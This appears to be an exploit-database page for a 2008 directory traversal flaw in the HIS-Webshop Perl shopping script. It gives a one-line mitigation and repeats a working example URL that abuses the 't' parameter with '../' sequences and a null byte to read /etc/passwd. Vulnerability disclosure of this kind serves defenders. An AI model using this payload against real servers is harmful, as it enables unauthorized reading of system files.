header-logo
Suggest Exploit
vendor:
HIS-Webshop
by:
Zero X
7.5
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: HIS-Webshop
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

HIS-Webshop Directory Traversal Vulnerability

HIS-Webshop is a shopping-system written in Perl by www.shoppark.de. The script doesn't check the 't'-parameter, which can be used to traverse directories. An example of this exploit is http://server.com/cgi-bin/his-webshop.pl?t=../../../../../../../../etc/passwd%00

Mitigation:

Ensure that the 't'-parameter is properly validated and sanitized.
Source

Exploit-DB raw data:

HIS-Webshop is a shopping-system written in Perl by www.shoppark.de
The script doesn´t check the "t"-parameter.

Example:
http://server.com/cgi-bin/his-webshop.pl?t=../../../../../../../../etc/passwd%00

<< Greetz Zero X >>

# milw0rm.com [2008-03-24]